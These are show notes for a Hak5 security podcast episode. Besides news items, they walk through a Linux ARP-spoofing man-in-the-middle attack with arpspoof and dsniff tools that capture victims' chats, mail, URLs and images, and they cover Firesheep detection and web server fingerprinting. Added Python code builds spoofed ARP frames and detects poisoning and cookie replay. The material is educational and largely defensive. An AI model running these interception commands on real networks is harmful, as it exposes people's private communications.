Hak5 908 – Linux man-in-the-middle attacks, detecting Firesheep in Firefox, HTTPD fingerprinting & spy satellites!
Defending against cookie hijacking attacks, man-in-the-middle tools for Linux, fingerprinting web servers the easy way, managing multiple SSH sessions and tracking government spy satellites! All that and more, this time on Hak5!
Jailbreaking is fun! RedSn0w has just been released by the DevTeam as a nice and easy untethered jailbreak for iOS 4.3.1. It’s available on Windows and OSX for all your Apple devices, except for the iPad 2 because apparently the security on the new tablet has been beefed up. But, I’m sure it won’t take long for someone to figure out a way around it.
While we typically don’t follow the hijinks of Anonymous, the group has recently targeted Sony’s playstation.com with a denial-of-service attack that left the website periodically inaccessible. The group released a manifesto announcing Operation Sony and pronounced the GeoHot lawsuit an “unforgivable offense against free speech and internet freedom, primary sources of free lulz”. Sony later tweeted that the PSN may be inaccessible due to “sporadic maintenance”.
If you get some spam very soon in your inbox, it may be because of a security breach at Epsilon. Epsilon, the world’s largest email marketing service, says the only information hackers got were names and email addresses. I’ve gotten several emails from companies so far, all saying the same thing- “your e-mail address may have been exposed by unauthorized entry into Epsilon’s system bla bla bla”- but this still means we’re more vulnerable to phishing scams and such. So, be aware and don’t give out your info to any weird emails.
RSA recently outlined how they were compromised in the much publicized attack on their network weeks ago. Over a 2-day period attackers sent two different phishing emails to employees with subjects like “2011 Recruitment Plan” which contained an attached Excel spreadsheet. The spreadsheet carried a zero-day exploit for an Adobe Flash vulnerability. From there the attacker installed a customized version of the Poison Ivy RAT and began escalating privileges across the network. The Flash vulnerability has since been patched and RSA claims that the seeds used to generate RSA keys have not been compromised.
Just plain awesome! You remember the Commodore 64? Of course you do! Well apparently, Commodore USA is coming out with a brand spankin new C64 with some nice PC specs, with advertisements along side the release of Tron: Legacy on DVD. No details on the specs just yet, but I’ll be checking back on their website to find out more…
Kerby’s Internet Protocol of the week
Crack the Code Challenge
Do you have what it takes to compete in our Crack The Code Challenge — brought to you by GoToAssist Express? Test your skills in our private lab network and bid for the title supreme leet hax0r. Winners will be featured on a future episode of Hak5!
ARP Spoofing with DSniff
Recently we’ve been having a lot of fun with Man-in-the-middle attacks. Shannon showed how to perform an arp cache poisoning attack on Windows using Cain & Abel. I showed how to detect the attack using XARP. She showed off sidejacking with Firesheep. Honestly eavesdropping is just plain fun. So this week I’d like to demo a couple of tools for us linux folks.
Again the premise is all the same. We’ll be using command line tools to tell our victim we’re the router, and vice versa.
The tools we’ll be using are the dsniff suite and driftnet. If you don’t already have ’em and you’re rocking Ubuntu it’s simply a matter of issuing sudo apt-get install driftnet dsniff
Before we get our attack started we’ll need to enable packet forwarding. This means we’ll allow the traffic of our targets to flow through our machine instead of being dropped, so the victim keeps its connection and has no reason to notice. Note that the redirect below is done by your own shell, not by the command, so sudo echo won’t work; run it from a root shell (sudo sysctl -w net.ipv4.ip_forward=1 does the same thing).
echo 1 > /proc/sys/net/ipv4/ip_forward
Now the poisoning itself. We tell the victim (10.13.37.124) that we’re the router (10.13.37.1), and we tell the router that we’re the victim. That’s two arpspoof processes, one per direction, each in its own terminal. The syntax is arpspoof -i interface -t target host-to-impersonate:
arpspoof -i eth0 -t 10.13.37.124 10.13.37.1
arpspoof -i eth0 -t 10.13.37.1 10.13.37.124
With the traffic flowing through us, pick your sniffer from the dsniff suite (or driftnet for the pictures):
msgsnarf -i eth0 (IM and chat messages)
urlsnarf -i eth0 (every URL requested, in web-server log format)
mailsnarf -i eth0 (SMTP and POP mail, written out in mbox format)
driftnet -i eth0 (images pulled out of the stream)
When you’re done, Ctrl-C each arpspoof (it re-ARPs the real MAC addresses on the way out so the victim and router find each other again) and turn forwarding back off with echo 0 > /proc/sys/net/ipv4/ip_forward.
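To see what arpspoof is actually putting on the wire, and how a host-side watcher like the XARP tool from a few episodes back catches it, here is an added example in Python. It is not code from the episode or from the dsniff project: it builds the unsolicited ARP “is-at” replies that arpspoof sends in both directions, then replays a handful of frames through a simple learning table that alerts when an IP suddenly claims a different MAC. The IPs are the ones from the demo above; the MAC addresses are made up.

```python
"""Added example (not from the Hak5 episode or the dsniff project): build the
unsolicited ARP replies that arpspoof sends, then detect the poisoning by
spotting an IP address that changes its MAC.  MAC addresses are made up."""
import struct

ETH_P_ARP = 0x0806
ARP_REPLY = 2

# Addresses from the episode's demo network plus invented MACs.
GATEWAY_IP, GATEWAY_MAC = "10.13.37.1", "00:11:22:33:44:01"
VICTIM_IP, VICTIM_MAC = "10.13.37.124", "00:11:22:33:44:7c"
ATTACKER_MAC = "de:ad:be:ef:00:01"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_ip, sender_mac, target_ip, target_mac):
    """Ethernet frame carrying an ARP reply that says 'sender_ip is at
    sender_mac', addressed to target.  This is exactly what
    'arpspoof -t target_ip sender_ip' repeats every couple of seconds."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, 6, 4, reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_mac, target_ip),
    or None if the frame is not an Ethernet/IPv4 ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None
    body = frame[22:42]
    return op, mac_str(body[0:6]), ip_str(body[6:10]), mac_str(body[10:16]), ip_str(body[16:20])


def find_poisoning(frames):
    """Replay frames through a learning table.  The first MAC seen for an IP
    is trusted (the way a host's ARP cache does); any later reply that maps
    the same IP to a different MAC is reported as (ip, old_mac, new_mac)."""
    table, alerts = {}, []
    for frame in frames:
        parsed = parse_arp(frame)
        if parsed is None or parsed[0] != ARP_REPLY:
            continue
        _, smac, sip, _, _ = parsed
        known = table.setdefault(sip, smac)
        if known != smac:
            alerts.append((sip, known, smac))
    return alerts


def demo_frames():
    """Constructed capture: two honest replies, then the two spoofed
    directions from the arpspoof commands above."""
    legit = [
        build_arp_reply(GATEWAY_IP, GATEWAY_MAC, VICTIM_IP, VICTIM_MAC),
        build_arp_reply(VICTIM_IP, VICTIM_MAC, GATEWAY_IP, GATEWAY_MAC),
    ]
    spoofed = [
        build_arp_reply(GATEWAY_IP, ATTACKER_MAC, VICTIM_IP, VICTIM_MAC),   # -t victim gateway
        build_arp_reply(VICTIM_IP, ATTACKER_MAC, GATEWAY_IP, GATEWAY_MAC),  # -t gateway victim
    ]
    return legit + spoofed


if __name__ == "__main__":
    for ip, old, new in find_poisoning(demo_frames()):
        print(f"ARP poisoning: {ip} was {old}, now claimed by {new}")
```

The detector is deliberately the same logic a static ARP entry gives you for free: pin the gateway’s MAC and anything that disagrees is an attacker (or a replaced router, which you also want to know about). On a real box you would feed it frames from a raw socket or a pcap instead of demo_frames().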
Last week’s trivia question was: What is this prototype built in 1998 that encrypts telephone calls using the symmetric encryption algorithm IDEA? The answer was Cryptophon.
This week’s trivia question is: What is the name of this prominent computer club that was founded in Berlin in 1981?
Answer at hak5.wpengine.com/trivia for a chance to win some swag!
Blacksheep – Firesheep defense
On a recent episode, I walked you through how to use FireSheep to hijack another computer’s session on your wireless network. I was able to see Darren log onto Twitter, click on his username, and write on his twitter account as @hak5darren, not @snubs. Haha, I just hacked his twitter, right?
Well, today, I’d like to show you BlackSheep, which does the exact opposite. If FireSheep is being used by someone on your network, you can be warned and block against it. BlackSheep is a Firefox add-on, just like FireSheep, and was built right off the same source code. So it reuses the same network listening back-end and the same list of sites and their corresponding session cookies. By doing this, it ensures that the fake traffic BlackSheep generates is exactly what FireSheep is expecting to see; when the fake session gets replayed from another machine, BlackSheep knows someone sniffed it. BlackSheep will even show you the IP address of the computer trying to hijack your account.
Now to get it working. First, download the BlackSheep add-on. Disable FireSheep if you have it as well, so BlackSheep doesn’t detect it.
In the options menu, choose the interval at which you want BlackSheep to create fake traffic. Its default is 5 minutes, which works fine. Click OK and you’re done configuring. Now, if FireSheep is detected on your network, you’ll see this popup on your screen.
BlackSheep is available for Mac, Windows, and Linux. You still need WinPcap if you’re on Windows, and it only works with Firefox, 32-bit only.
Although BlackSheep does help with FireSheep, it only tells you that someone is sniffing after they’ve already grabbed the bait; it doesn’t stop your real cookies from going over the air in the clear. So you should still be using HTTPS for your surfing.
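The trick BlackSheep relies on is a honeytoken: a cookie value that is random, never a real session, and known only to you, so the moment it shows up in a request from any other address you have caught a sniffer red-handed. The following is an added example of that logic in Python; it is not BlackSheep’s own code, and the site name, cookie name and IP addresses are made up for the demo.

```python
"""Added example (not BlackSheep's code): the honeytoken idea behind it.
Plant a fake session cookie for a site on the sniffing list, send it over the
wire from our own address, and alert if any request from a different source
address ever presents that value.  Host, cookie name and IPs are invented."""
import secrets
from dataclasses import dataclass


@dataclass(frozen=True)
class Canary:
    host: str       # site whose session cookie we imitate
    name: str       # the cookie name a sidejacker looks for on that site (assumed)
    value: str      # random; never a real session, so it has no value except as bait
    origin_ip: str  # our own address; anybody else presenting the value is a hijacker


def make_canary(host, name, origin_ip):
    """Fresh 128-bit random value: it can only be known by someone who sniffed it."""
    return Canary(host, name, secrets.token_hex(16), origin_ip)


def parse_request(raw):
    """Minimal HTTP/1.x request parser: (request_line, headers, cookies)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    cookies = {}
    for part in headers.get("cookie", "").split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            cookies[k] = v
    return lines[0], headers, cookies


def detect_hijack(canaries, requests):
    """requests: iterable of (src_ip, raw_request_bytes) as a sniffer hands them
    over.  Returns (hijacker_ip, host, cookie_name) for every replayed canary."""
    lookup = {(c.host, c.name): c for c in canaries}
    alerts = []
    for src_ip, raw in requests:
        _, headers, cookies = parse_request(raw)
        host = headers.get("host", "").lower()
        for name, value in cookies.items():
            c = lookup.get((host, name))
            if c is not None and value == c.value and src_ip != c.origin_ip:
                alerts.append((src_ip, host, name))
    return alerts


def demo():
    """Constructed traffic: our beacon, an unrelated request, then a replay."""
    canary = Canary("social.example", "session_id", "c0ffee" * 5, "10.13.37.124")
    beacon = (b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
              b"Cookie: session_id=" + canary.value.encode() + b"; lang=en\r\n\r\n")
    innocent = (b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
                b"Cookie: session_id=someoneelsesrealcookie\r\n\r\n")
    replay = (b"GET /home HTTP/1.1\r\nHost: social.example\r\n"
              b"Cookie: session_id=" + canary.value.encode() + b"\r\n\r\n")
    traffic = [("10.13.37.124", beacon), ("10.13.37.50", innocent), ("10.13.37.50", replay)]
    return detect_hijack([canary], traffic)


if __name__ == "__main__":
    for ip, host, name in demo():
        print(f"{ip} replayed our fake {name} cookie for {host}: FireSheep is running there")
```

Note the two properties that make this work: the value is unguessable (secrets.token_hex, not a counter), and it is matched together with the host and the cookie name, so a legitimate user who happens to share the network never trips it. What the detector cannot do is stop the sniffer from taking your real cookie in the same capture, which is why HTTPS is still the fix.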
HakTip: Identifying Web Servers
Wayno from pkill-9 sent this in. Two quick and dirty ways to ID a web server. First:
curl -I www.hak5.wpengine.com
Should result in something like
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2011 01:00:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/22.214.171.12435 PHP/5.2.9
Last-Modified: Tue, 05 Apr 2011 00:04:06 GMT
Accept-Ranges: bytes
Content-Length: 66982
X-Pingback: http://www.Hak5.org/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: Accept-Encoding,Cookie
Content-Type: text/html; charset=UTF-8
The second, geekier way is to do it with telnet. Connect, type the request line, then hit Enter twice (the blank line is what tells the server your headers are finished):
telnet www.hak5.wpengine.com 80
HEAD / HTTP/1.0

Keep in mind the Server header is whatever the admin configured it to be (Apache’s ServerTokens Prod cuts it down to just “Apache”), so treat it as a hint, not proof.
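Here is the same banner grab done the telnet way from Python, with the Server header split into product/version pairs so you can feed it into something else. This is an added example, not Wayno’s or the episode’s code; the hostname in the usage line is the one from the show notes and the sample response in fingerprint_demo() is a trimmed copy of the curl output above.

```python
"""Added example (not from the episode): a raw HEAD request, the way the
telnet trick works, plus parsing of the Server banner.  The sample response
used by fingerprint_demo() is trimmed from the show notes' curl output."""
import re
import socket

# product/version tokens such as "Apache/2.2.15"; parenthesised comments like
# "(Unix)" are skipped by the version part refusing parentheses.
TOKEN = re.compile(r"([A-Za-z][\w.+-]*)/([^\s()]+)")


def head_request(host, port=80, timeout=5):
    """Send HEAD / and return the raw response head (network call; the parsing
    below is what the rest of the example exercises).  HTTP/1.0 with a Host
    header keeps name-based virtual hosts honest."""
    req = f"HEAD / HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        while b"\r\n\r\n" not in b"".join(chunks):
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_response(raw):
    """Return (status_line, headers) with header names lower-cased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        if ":" in line:
            k, v = line.split(":", 1)
            headers[k.strip().lower()] = v.strip()
    return status, headers


def server_components(server_value):
    """'Apache/2.2.15 (Unix) PHP/5.2.9' -> [('Apache','2.2.15'), ('PHP','5.2.9')]."""
    return TOKEN.findall(server_value)


def fingerprint(raw):
    """Everything worth keeping from a HEAD response for a quick server ID.
    'server' is empty when the admin has hidden the banner."""
    status, headers = parse_response(raw)
    return {
        "status": status,
        "server": server_components(headers.get("server", "")),
        "powered_by": headers.get("x-powered-by"),
        "pingback": headers.get("x-pingback"),
    }


def fingerprint_demo():
    # Constructed from the curl output in the show notes (trimmed).
    sample = (b"HTTP/1.1 200 OK\r\n"
              b"Date: Tue, 05 Apr 2011 01:00:09 GMT\r\n"
              b"Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.9\r\n"
              b"X-Pingback: http://www.Hak5.org/xmlrpc.php\r\n"
              b"X-Powered-By: W3 Total Cache/0.9.1.3\r\n"
              b"Content-Type: text/html; charset=UTF-8\r\n\r\n")
    return fingerprint(sample)


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "www.hak5.wpengine.com"
    print(fingerprint(head_request(host)))
```

The X-Pingback and X-Powered-By headers are kept because they often leak more than Server does: an xmlrpc.php pingback URL says WordPress even on a box whose Server line has been trimmed to a bare “Apache”.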
Want to share your tips with us? [email protected]
Emails: SSH Multiplexing & Satellite tracking
Thank you so much for the info you have been giving out on screen, and multiplexing screens! I just wanted to make you aware, if you weren't already, of PuTTY Connection Manager. The most reported feature is the tabbed interface for PuTTY, but for me the best feature is the screen splitting. I can have one window with all of my PuTTY sessions open and arranged how I want. Also, you can send commands to all viewable PuTTY sessions, so I can run one command on each of my servers at the same time.
Gpredict is a real-time satellite tracking and orbit prediction application, and it actually runs better on my WinblowsXP than it does on my many Ubuntu (10.4, 10.10, and bt4R2) laptops. It's really cool, I happen to be a Telecommunications/SatCom guy and this software is really neat because it has all the satellites' orbit locations pre-loaded and after you put in your geo coordinates it will tell you when the satellite will be visible and at what azimuth and elevation you should be using to see the beacon (via spectrum analyzer)... And if you have no idea what I'm saying: You can select all the military satellites from a drop down list and watch them move over the globe... NEAT!!!
Keep up with the latest on Hak5 by following us on Twitter or Facebook. Subscribe and get your weekly technolust delivered automatically. Or show your support and grab some swag from the HakShop, including the new airport friendly WiFi Pineapple and hoodie. Finally, if you'd like to suggest a topic or ask a question, feel free to hit up [email protected].